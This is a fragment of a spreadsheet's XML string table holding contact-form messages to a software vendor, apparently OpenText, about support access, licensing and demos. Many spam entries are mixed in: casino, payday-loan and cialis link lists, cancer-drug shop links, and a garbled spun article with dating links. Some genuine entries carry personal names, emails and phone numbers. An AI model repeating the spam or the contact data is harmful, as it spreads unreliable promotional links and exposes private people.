&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/552/&gt;caprelsa капрелса вандетаниб vandetanib&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/565/&gt;тайверб цена в москве&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/541/&gt;зелбораф цена&lt;/a&gt;_x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/547/]мекинист купить[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/575/]кипролис купить[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/570/]ибрутиниб[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/550/]тагриссо осимертиниб tagrisso osimertinib[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/546/]имбрувика инструкция[/url]_x000D_
</t>
  </si>
  <si>
    <t>Unable to access Knowledge Center. It keeps asking for e-mail confirmation and it denies the access to the portal. Please, help.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning_x000D_
 _x000D_
I am currently looking to relocate with my wife to Manila from New Zealand. I saw your company on jobstreet._x000D_
 _x000D_
I am have vast experienced in Banking/Finance which includes high level roles around policy/compliance/staff management/training/development/projects. Although a role may not be in finance directly, quality assume, call centre management may also be options I would consider._x000D_
 _x000D_
My wife is a fully qualified accountant with a degree from St Pauls in Philippines and completed in New Zealand as well through Auckland University. She has vast experience in the filed in New Zealand and would be looking at financial management/senior roles. _x000D_
 _x000D_
I will have no problem getting visa for working in Phils given we are married, however my role would need English as the primary language._x000D_
 _x000D_
Salary wise we would be looking for around 60k+_x000D_
 _x000D_
Can you please advise if you would be able to find employment for us in the near future? My wife has to give 1 month notice and then could be in the Philippines, whereas I need to give 2 months’ notice_x000D_
 _x000D_
Thank you, I look forward to hearing from you shortly_x000D_
 _x000D_
Nathan_x000D_
Nathan Rivett_x000D_
Credit &amp; Operational Info Manager| Retail Operations &amp; Risk | ASB_x000D_
</t>
  </si>
  <si>
    <t>towards the south wok cookware females identified as having long point cancer of the breast normally_x000D_
_x000D_
The Canadian capability away your research, out of your company over specialized medical Evaluative Sciences in addition to women's classes facility, articulate that may variations in outreach which can small section communities may also demonstrate why you possibly can find dis literallyparities relating nationalities in any time you're cancers of the breast diagnosed._x000D_
_x000D_
find out more: have proven to be moles a warning sign just for breast cancers? upcoming research suggests interconnection_x000D_
_x000D_
"china men and women in Ontario are actually the particular first racial few social groups acknowledged while cancer tumor institutions as important world. The far east neighbourhood is also very into action to advertise the idea with their own associations, dr. Ophira Ginsburg, A health care oncologist in addition encourage researcher, shown world-wide announcement._x000D_
_x000D_
"but rather most hadn't experienced this guidance advocacy during the the southern region of hard anodized cookware communities, lady reported._x000D_
_x000D_
Ginsburg regarded as a researchers within college's analyze initiate and a school of gta mentor. she gets stayed the last decade [url=http://www.digitaljournal.com/pr/3413074]ASiame[/url] zeroing in to differences in breast cancer final results and endurance quotations amwomen andg marginalized [url=https://about.me/asiame]asiame.com[/url] in time even Bangladesh and Vietnam._x000D_
_x000D_
For the study, this girl teamed with track of ICES' dr. Baiju Shah to manufacture developed who will designate chinese in addition to the to the south fernrrstliche communities upon incredibly last labels._x000D_
_x000D_
find out more: amazing Canadian insurance plans for the purpose of practitioners, younger ladies combined with cancers of the breast_x000D_
_x000D_
for you to easily 41,000 customers diagnosed with [url=http://www.abnewswire.com/pressreleases/asiame-directs-the-way-for-heartbroken-singles-to-ove</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casino games[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino games[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games slots&lt;/a&gt;</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]slot online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;play casino games online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino games[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;play casino games online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino games real money[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]slot online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;kasino&lt;/a&gt;</t>
  </si>
  <si>
    <t>Interested in pricing and plan options for DAM system</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]best online casino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]play casino games online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]casino slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;casino games real money&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino real money[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]slot game[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to use xml export/import to move a folder from version 10.5 to 16.2. I am getting error but I cannot create a ticket because I have to validate my email. I have done this repeatedly and still asks me to validate. </t>
  </si>
  <si>
    <t>Do you have any opentext representatives at the SSON conference in Orlando this week?</t>
  </si>
  <si>
    <t>I am conducting market research into potential software solutions for SSA ERM requirements._x000D_
OpenText responded to our RFI with a potential solution.  We are requesting a Budgetary Estimate for the solution detailed in your response to the RFI.  This is not a request for goods or services.  No acquisition will be forthcoming as a result of this market research.  I am not authorized to commit government resources.  Please respond by email since I will require a written document.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Upon reviewing our records, we show that there is an open debit balance on your account in the amount of $1,880.49._x000D_
_x000D_
Based on past activity we show the following in our system:_x000D_
_x000D_
A credit memo of 3,150.38 relating to a credit for duplicate payment of invoice ICC00142226 _x000D_
A credit memo of 3,302.71 relating to a credit of invoice ICC00140664 _x000D_
Invoice 105902 of 350.00  _x000D_
Invoice ICC00142736 of 4,222.60_x000D_
_x000D_
I am requesting a refund check to be sent to the following address to clear up this remaining balance._x000D_
_x000D_
Luxottica USA LLC._x000D_
Attn: Josh Kazee_x000D_
4000 Luxottica Place_x000D_
Mason, OH 45040_x000D_
_x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To ask Investor Relations when Open Text Investor Day will be held this year?_x000D_
</t>
  </si>
  <si>
    <t>Hello._x000D_
_x000D_
We have an application written in Forms which we would like to migrate to Java.  We very much like to know about costs about using your services._x000D_
_x000D_
I appreciate your support._x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam,_x000D_
_x000D_
Commtel Networks is a System Integrator which is pioneer in the dedicated telecommunication network space, specialized in providing customized engineering and technology solutions to our customers in the Oil &amp; Gas, Power, Transportation and related sectors._x000D_
_x000D_
We are looking for a Document Management Solutions Software._x000D_
We request you to provide a suitable software which helps to have a online smooth control/flow/access/storage of information’s between different departments like Marketing, Bidding, Engineering, Procurement, Construction, Stores &amp; Logistics._x000D_
_x000D_
In short, the software must have the capacity to help plan, organize, manage resource tools and develop resource estimates as per enclosed attachment._x000D_
The software needs to be sophisticated to manage estimation and planning, scheduling, cost control and budget management, resource allocation, collaboration software, communication, decision-making, quality management and documentation or administration systems._x000D_
_x000D_
We request you to suggest a suitable software as per above requirement and provide techno-commercial offer for the same at the earliest._x000D_
Further, provide Videos/Operational manual of how your software actually operates for us to understand briefly._x000D_
</t>
  </si>
  <si>
    <t>licensing questions</t>
  </si>
  <si>
    <t>Kann man bei Ihnen Lizenzen des Brava DWG Viewers beziehen?_x000D_
Mit freundlichen Grüßen_x000D_
W. Börner</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Would you be interested in acquiring a “Healthcare Industry Professionals Database” for your marketing products and services?_x000D_
We are a specialized Healthcare Database provider, we can provide you contact details like email address, telephone numbers, postal address, etc., which can assist you in your marketing projects._x000D_
Please find the below details of some of the contacts available in our database and let me know your thoughts:_x000D_
Specialty’s	Total contacts_x000D_
Anesthesiologists	24,000+_x000D_
Dermatologists	27, 000+_x000D_
Pediatricians	63,000+_x000D_
Veterinary	41,000+_x000D_
chiropractors	27,000+_x000D_
Ophthalmologists	16,000+_x000D_
Cardiologists	36,000+_x000D_
Pediatric Surgeon	1,500+_x000D_
Orthopedic	24,000+_x000D_
Pharmacist	38,000+_x000D_
Plastic Surgeons	7,618+_x000D_
Aesthetic professionals	6,752+_x000D_
dentists	250, 000+_x000D_
_x000D_
We have maintain contacts for Hospitals, Clinics, Hospital executives, Medical equipment manufacturers, Pharmaceutical companies, Chiropractors and Physical Therapists , Physicians and Doctors, Nurses, Specialists etc.._x000D_
We guarantee 90% accuracy on the Emails and 95% accuracy on all the other data information_x000D_
 _x000D_
Kindly let me know if I can be of help so that I can give you more information, Counts Pricing for your review. You may indicate your interest in the below mention parameters._x000D_
 _x000D_
Target Industry      :_x000D_
Target Geography:     _x000D_
Target Job Title      :     _x000D_
   _x000D_
We would be delighted to hear from you!_x000D_
 _x000D_
Best Regards,_x000D_
Sophia William| Business Development coordinator         _x000D_
 _x000D_
SERVICES -Consumer List | Technology List | Healthcare list | Event Promotion | Email Appending | Email Campaigns | SEO |Content writing| Telemarketing services._x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Suite à la mise à jour de mon profil (email et société) je n'ai plus accès à mon historique (My support, My Accounts, etc)_x000D_
Pourriez-vous svp m'aider ?_x000D_
Merci par avance,_x000D_
Cordialement,_x000D_
Marianne Minguez</t>
  </si>
  <si>
    <t>Good afternoon, _x000D_
_x000D_
I am writing to introduce Hive and ask for support towards out Make@Hive creative programme supporting people recovering from physical and mental health issues in the Bradford District.  Hive was established in 1982 and registered as a charity (1100741) and company limited by guarantee (4720047) in 2003._x000D_
_x000D_
Hive is a community arts charity based in Shipley and working across the Bradford District. We work with vulnerable groups including people with physical and mental health issues, the long term unemployed, young people at risk and isolated older people.  We offer a variety of creative opportunities to develop potential including creative classes, supported and independent access to our creative facilities, volunteering and work experience opportunities. Our model of working is to provide user led creative facilities and support that help people to focus on themselves and their own personal development and wellbeing. We work with approx. 2,000 people per year at our venue and across the district.  Our workshops for adults, ranging from sewing and pottery making to basic DIY and woodwork, are vital to hundreds of people not only in learning a new skill, but also developing confidence, self-esteem, reducing social isolation, trying out new ideas and learning to interact with others._x000D_
_x000D_
We have recently lost the support of a funder that enabled us to offer free places on these courses to those very much in need, including older isolated people, people recovering from mental health distress, people with disabilities, carers and people unable to work._x000D_
We would like to expand the service to provide an additional session per week for ‘Chat &amp; Craft’ and ‘Woodworks’ - two of our most popular groups. These two sessions have the broadest appeal and ‘Woodworks’ group particularly appeals to men who are less likely to access support from statutory mental health services or even talk about their mental health issues._x000D_
_x000D_
“I went to a mental health day centre</t>
  </si>
  <si>
    <t>Interested to see what Megellan can do for us</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogameslistonline.com/]online casino slots[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://otaku-bookmark.com/story3521785/Р­СЂРѕС‚РёС‡РµСЃРєРёР№-РјР°СЃСЃР°Р¶]Here[/url]|_x000D_
</t>
  </si>
  <si>
    <t>When dragging and dropping an icon, like "Reply" or "Forward" to a tool bar, how do you get the drop-down arrow to be attached to the icon so that you have "options"?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi. I would like to have a discussion with a salesman about the application of this software. I'm interested in finding out if it could meet the needs of my firm. </t>
  </si>
  <si>
    <t>guest test post _x000D_
[url=http://temresults2018.com/]bbcode[/url] _x000D_
&lt;a href="http://temresults2018.com/"&gt;html&lt;/a&gt; _x000D_
http://temresults2018.com/ simple</t>
  </si>
  <si>
    <t xml:space="preserve">DWG viewer (free version to paid version)._x000D_
Hi,_x000D_
I have 2 questions regarding DWG viewer (upgrading from free version to paid version)_x000D_
Is it possible to get the DWG viewer paid version as MSI format? </t>
  </si>
  <si>
    <t>Having issues trying to create an account for 'My Support' - Dongle ID is V2011688148U</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello,_x000D_
_x000D_
We allways use Brava! DWG Viewer free for our files. Now we should pay for the new release._x000D_
so, is this one-time fee? or we should pay for every year. and please how much we should pay for only viewer CAD files?_x000D_
_x000D_
Thanks_x000D_
Gamal_x000D_
</t>
  </si>
  <si>
    <t>Just paid for Brava, the link that I received for licence and download show "Content Server Error: Error logging in._x000D_
[Invalid username/password specified_x000D_
_x000D_
I cannot download the program nor can I access my licence key</t>
  </si>
  <si>
    <t>Dear Sir or Madam!_x000D_
_x000D_
I am writing to you to ask a question about downloading purchased software._x000D_
_x000D_
Our company bought Exceed Single License (Electronic) (2 Qty) (Billing Doc.#: 9000360724) from one of your resellers (www.softline.ru) and received a confirmation e-mail._x000D_
According received e-mail we were succeeded in registration our account at www.opentext.com (for evk@mcc.rsa.ru email) and in entering into our account but we have not managed to download purchased software. _x000D_
_x000D_
When we try to do it with product finder tutorial (https://knowledge.opentext.com/knowledge/llisapi.dll/open/47696369) we received a message "No Access_x000D_
We're sorry, your account does not grant you access to this resource. Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us. Please click on the link below to complete the process"._x000D_
_x000D_
We click link, receive confirmation e-mail, click confirmation link dozens of time, but result always the same - No Access._x000D_
So circumstances and reasons which prohibited us from downloading are clear - we have no access to support section of your site._x000D_
_x000D_
I would appreciate if you provide some help for us or explain what we are doing wrong._x000D_
_x000D_
Best regards,_x000D_
Muzyka Alexander.</t>
  </si>
  <si>
    <t>We need to share RFI for Document Management system to Opentext. Please share the required email id to send the same.</t>
  </si>
  <si>
    <t>Hello and Good Day_x000D_
_x000D_
I am Mike Alias Sanjeev ,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Mike Alias  Sanjeev</t>
  </si>
  <si>
    <t>Interested in a demo of Open text and SuccessFactors functionality and what capabilities this solution currently has.</t>
  </si>
  <si>
    <t>I worked for OpenText in 2017, and need my tax information for filing.</t>
  </si>
  <si>
    <t>This is Effie from SAPA.This letter is to invite you sincerely to join in the upcoming conference - Asian Pharma IT Summit 2018 (June 6th-7th, 2018, Shanghai, China) for 300+ delegates from large pharma, biotech, leading research institutes and technology pioneers to explore the real world value and application of the most cutting-edge technology along the R&amp;D pipeline. As you know, China has debuted in the field of drug discovery and developpment. So the clinical operation will be very important. That means China will be a huge market for you. And lots of chinese pharma and biotechs would like to know more about the company just like your company. If you are interested, please feel free to cantact me for more details about our summit.Looking forward to hearing from you soon.</t>
  </si>
  <si>
    <t xml:space="preserve">I am unable to login the Partner Site but unable to view any content within it with almost all the sections appearing blank. Can you please help? </t>
  </si>
  <si>
    <t xml:space="preserve">I was looking to use the Captaris workflow program and see that you guys acquired Captaris but I can't find a lot of info on the program on your website.  Can you provide some info on the platform?  </t>
  </si>
  <si>
    <t>I would like to request a demo.</t>
  </si>
  <si>
    <t>cialis spendere pococialis 40 mg safe  &lt;a href="https://cialisworld.com"&gt;cialis generic&lt;/a&gt; _x000D_
james naughton haciendo anuncios cialistacialis 20 mg imagenes  &lt;a href="https://genericcialisonline2018.com"&gt;cialis generic&lt;/a&gt; _x000D_
how effective is cialis for edcialis de 5mg para que sirve  &lt;a href="https://cialiszxc.com"&gt;cialis generic&lt;/a&gt; _x000D_
sustitutos del cialisgeneric cialis pills 1956  &lt;a href="https://buycialiszsx.com"&gt;cialis generic&lt;/a&gt; _x000D_
cialis generico mas baratoCialis 5 mg por dia  &lt;a href="https://buycialisgenericzs.com"&gt;cialis prices&lt;/a&gt; _x000D_
achat cialis 5mgcialis 40mg  &lt;a href="https://buyrealcialisonline.com"&gt;generic cialis&lt;/a&gt; _x000D_
precios cialis 1200 mgenviar cialis a la caja po  &lt;a href="https://cialisforyou.com"&gt;cialis prices&lt;/a&gt; _x000D_
 _x000D_
[url=https://buyrealcialisonline.com]cialis official site[/url]</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
We Vidillion provide Dedicated Internet Access to your office at 901 Mariners island, Suite 100, San Mateo, CA._x000D_
all of a sudden at around 2pm PT we lost connectivity to all our devices at your facility._x000D_
We tried to find our way through your support numbers but couldn't make any head way._x000D_
Request you to please get back to us or provide us the appropriate number/email so we can sort the issue out asap._x000D_
You can get back to us via support@vidillion.com / netops@totalstreamsupport.net or on (775)391-5230_x000D_
_x000D_
Thank you,_x000D_
Vivek_x000D_
Vidillion Inc._x000D_
www.vidillion.com</t>
  </si>
  <si>
    <t>Kindly send me more documentation on Documentum. I used it at OKLNG and I want to propose to a client with a large number of users.</t>
  </si>
  <si>
    <t>Dear All,_x000D_
I need access to knowledge center. I'm Documentum consultant. _x000D_
My department is:_x000D_
Strategic Outsourcing &amp; Delivery (FISVA...1291)_x000D_
My deputy is: jose_miguel.sanchez@roche.com_x000D_
_x000D_
Please enable for me full access or provide me contact to person responsible for approval access for Roche users. _x000D_
_x000D_
Best regards,_x000D_
Pawel</t>
  </si>
  <si>
    <t xml:space="preserve">This is my second form I am completing with a couple of voice messages . I am interested in implementing Documentum. May I have a response please? </t>
  </si>
  <si>
    <t>Need a fax server solution.</t>
  </si>
  <si>
    <t>Need a cloud solution</t>
  </si>
  <si>
    <t>I can not access the Demonstration Systems option. I already tried the Getting Started Guide and I can not log in._x000D_
My user is: mitchel_ungaro@iecisa.com_x000D_
_x000D_
I await your comments.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There_x000D_
_x000D_
My name is Matthew Schwan and I am the Account Manager at KSG. I am looking to get in touch with whoever handles the purchasing of staff apparel. We currently work with the University of Laurier for their athletic and staff apparel and would like to extended similar opportunities and discounts to other local businesses._x000D_
_x000D_
If you can let me know any next steps or get me in touch with the proper contact that would be greatly appreciated_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm interested about *.dwg viewer, for one user. Before purchase I have few questions:_x000D_
1. What version is correct for me when only purpose is to view dwg files and sometimes use measure tool in your software?_x000D_
2. Is a license fee one-time cost or there are additional fees, like yearly subscription?_x000D_
3. What is a maintenence fee and what I'll receive?_x000D_
4. How I can transfer software to another PC in case of operating system re-installation or new PC purchase?_x000D_
_x000D_
Best regards,_x000D_
Rene</t>
  </si>
  <si>
    <t>We need Easylink/OpenText new W-9 so we can pay our invoices.</t>
  </si>
  <si>
    <t>Licensing Question. Is it concurrent or user based licensing.</t>
  </si>
  <si>
    <t xml:space="preserve">Hola, me gustaria ver una demo y pedir presupuesto para el gestor documental y saber si esta preparado para la llegada del GPRD en mayo._x000D_
</t>
  </si>
  <si>
    <t>Looking for quote on 10 licenses for Open Text connectivity to UNIX boxes from Windows v(7,8,10)</t>
  </si>
  <si>
    <t xml:space="preserve">I can't install software or patches any more error (no access). I check my support access and it has been changed to read only. I guess this is the issue. please to return my support access to technical </t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
We are seeking for an enterprise content management solution which support Arabic and Persian language. So found your solution and now are to evaluate OpenText ECM suite. Could you inform us of the steps._x000D_
Please reply me via email._x000D_
_x000D_
Best Regards,_x000D_
Hossein Mirheydari,_x000D_
_x000D_
DOX Technologies L.L.C._x000D_
E-mail: hossein.mirheydari@dox.ae | www.dox.ae_x000D_
Tel: +971 4 430 55 77| +971 4 430 66 77| +971 4 430 77 66| Fax: +971 4 430 57 57_x000D_
Address:_x000D_
Office 3206, The Citadel Tower_x000D_
Business Bay - Dubai - UAE_x000D_
P.O.Box: 72981 - Dubai</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in purchasing and using Captiva.  We purchased Captiva years ago but never implemented it.  We are currently using Documentum for image storage and KFI workflows and manage approximately 2M pages per year._x000D_
_x000D_
Our corporate office is in Stamford, CT, but our operations team is in Franklin, TN._x000D_
_x000D_
Please call me to setup some time to discuss options._x000D_
</t>
  </si>
  <si>
    <t>I sent a question with error in company name  . Our company is MANUEL ALVES LDA_x000D_
Our qustio is how REHOST the licence key .We need add a new network card in the computer, and we need a new licence key for our new card with mac address 00-10-A7-09-87-FE_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I was researching top Node companies and came across your profile. I’ve heard you guys are doing very well in the market so it’s no wonder you’re hiring so aggressively. You look like a perfect fit for the direction we’re moving as a company._x000D_
At SkySys, we specialize in hiring technical and skilled people according to the needs of our Clients. We’ve worked with topmost Aerospace, IT and Railway companies and I think we’d be able to offer you a lot of value here._x000D_
I’d love to work with you, look forward to hear from you._x000D_
_x000D_
Thank You!</t>
  </si>
  <si>
    <t xml:space="preserve">I can´t REHOST my Key Licence . My computer have a problem with card network and i need add a new card that a diferente mac address </t>
  </si>
  <si>
    <t>Inquiry about team developer upgrade license purchase for our custumer</t>
  </si>
  <si>
    <t xml:space="preserve">I need to open a ticket but I can't. Is it a problem with our account or a problem with the support ? </t>
  </si>
  <si>
    <t>We would like to reach out to the successor of Jaap Rigter, since he left we have never been introduced to the new account executive.</t>
  </si>
  <si>
    <t>Estimados,_x000D_
_x000D_
Por favor podrian indicarme un contacto comercial para productos/renovacion de licencias de Open Text en Argentina._x000D_
_x000D_
Gracias</t>
  </si>
  <si>
    <t>What are the start &amp; end times of your VIM Bootcamp courses delivered virtually in the US? -  Steve</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://casinogameslistonline.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>I came to know that OpenText is looking for DevOps engineers at your Hyderabad location. We are a Cloud Solutions company and we have executed projects for reputed companies based out of USA. We have recently completed one of our customer engagement and a team of DevOps Engineers ranging from 3 to 15 years are available for immediate deployment. Please reply to email if you are open to take these candidates on contract roles. We will be happy to serve you.</t>
  </si>
  <si>
    <t>Documentum for document control and workflow automation. I had the opportunity to use Documentum while I was OKLNG in Nigeria and I would like to propose it to my client. My client has over 3000 clients in different locations in Nigeria all linked together through their network servers. I would like a comprehensive pack with details of my requirements.</t>
  </si>
  <si>
    <t xml:space="preserve">can't download software or patches from my account anymore error (No Access). my support access has been changed to read only. I guess this could be the issue </t>
  </si>
  <si>
    <t>I am unable to login to GXS Trading Grid Online as it states I have entered incorrect password too many times.  Please can you assist in helping me unlock_x000D_
thanks _x000D_
Angela</t>
  </si>
  <si>
    <t>Search and selection of the OCR system</t>
  </si>
  <si>
    <t>Hi, I am looking for training on below topic:_x000D_
3-0715 Archive Center Installation and Administration v16_x000D_
3-0702 Archive Server Advanced Administration (formerly 715)_x000D_
_x000D_
Could you please provide dates on Jun/July 2018. It will be fine within Europe._x000D_
_x000D_
Thanks,_x000D_
Mritunjay Saw</t>
  </si>
  <si>
    <t>Formación en el idioma español de la herramienta Documentum y el uso de la utilidad DQL</t>
  </si>
  <si>
    <t>I want to know if the client version of RightFax 10.6.1.753 is compatible with Windows 10. Thank you</t>
  </si>
  <si>
    <t>Please Close My Account</t>
  </si>
  <si>
    <t>Hello, I was wondering if it's possible to buy the domain www.easylink.com. Looking forward to hearing from you._x000D_
_x000D_
Best regards,_x000D_
Rutger Lokhorst</t>
  </si>
  <si>
    <t>Please grant my account access to "My Support" ASAP so I can download the software I already paid for!!!_x000D_
/DK</t>
  </si>
  <si>
    <t>We would like to order viewer licences but redirection to paypal page not working.</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://casinogameslistonline.com/]slot game[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino games&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t xml:space="preserve">To Customer Support_x000D_
_x000D_
We have been using the first-class for almost 20 years. We would like to know about your development schedule of the product especially the timing of the release of  the new version for the latest Mac OS. _x000D_
_x000D_
Best regards,_x000D_
Yoshimi  </t>
  </si>
  <si>
    <t>payday loans online _x000D_
[url=https://smajloans.com/]payday loans no credit check[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans online&lt;/a&gt; _x000D_
payday loans online</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Dylan Grey, my company is Custom A Design. We are a professional web company that provides white label web development services all around the world._x000D_
_x000D_
I want to inquire if you are looking for a partner to handle your development, design or digital marketing projects?_x000D_
_x000D_
We are very affordable, and we make sure to complete projects before it's target date._x000D_
_x000D_
Here is a link to our rates:_x000D_
_x000D_
https://www.customadesign.com/rates_x000D_
_x000D_
Here are some websites that we have created so you can gauge the quality of our work:_x000D_
_x000D_
www.underonenationtribetradingpost.net_x000D_
www.groovydawgpartyrentals.net_x000D_
www.splashhawaii.com_x000D_
www.allroads65max.org_x000D_
www.clslending.net_x000D_
www.blacktidedev.com_x000D_
www.vivianwomenscenter.com_x000D_
www.trucksofhouston.com_x000D_
_x000D_
Our team is more than capable in completing your projects._x000D_
_x000D_
If you have any questions, feel free to email me back or call me at 1-214-306-6103. You can also find me on Skype: dylan@customadesign.com_x000D_
_x000D_
Best of health,_x000D_
Dylan Grey_x000D_
dylan@customadesign.com_x000D_
214-306-6103_x000D_
</t>
  </si>
  <si>
    <t>Please let me know my Account Manager. I am in midst of budgeting and would like to know the support and maintenance costs for all products that Sysco Canada uses from OpenText.</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested In getting one of my developers on the APAC virtual course for  doing the online course for StreamServe StoryTeller Quickstart v16_x000D_
Is it possible to get him to register for the March or May session._x000D_
Also what would be the payment procedure? Online CC payment?_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Just to get knowledge</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Do you want to market your product or service to 42 million USA businesses and 26 million executives with contact info, gender, credit score if available and more?_x000D_
_x000D_
I recently used this idea to help our clients almost triple their monthly run rate._x000D_
_x000D_
The ultimate marketing packaging for B2B, acquire these files once (with sortable categories and use unlimited_x000D_
with free updates for 1 year_x000D_
_x000D_
http://www.mailbanger.com/usa-business-database-executive-edition</t>
  </si>
  <si>
    <t>Am performing an OCR evaluation. Interested in OpenText teleform. Would like some more detailed information on the product and would like to arrange a presentation / demo.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino slots[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casino online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]casino slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casinos online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino real money[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;play casino games online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]cassino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt;</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans&lt;/a&gt; _x000D_
payday loans</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casinogameslistonline.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino games&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t xml:space="preserve">I need to download your add On for SSH for my trial but am unable to locate the down load. _x000D_
</t>
  </si>
  <si>
    <t>payday loans online _x000D_
[url=https://smajloans.com/]online loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;online loans&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans online&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino slots[/url] _x000D_
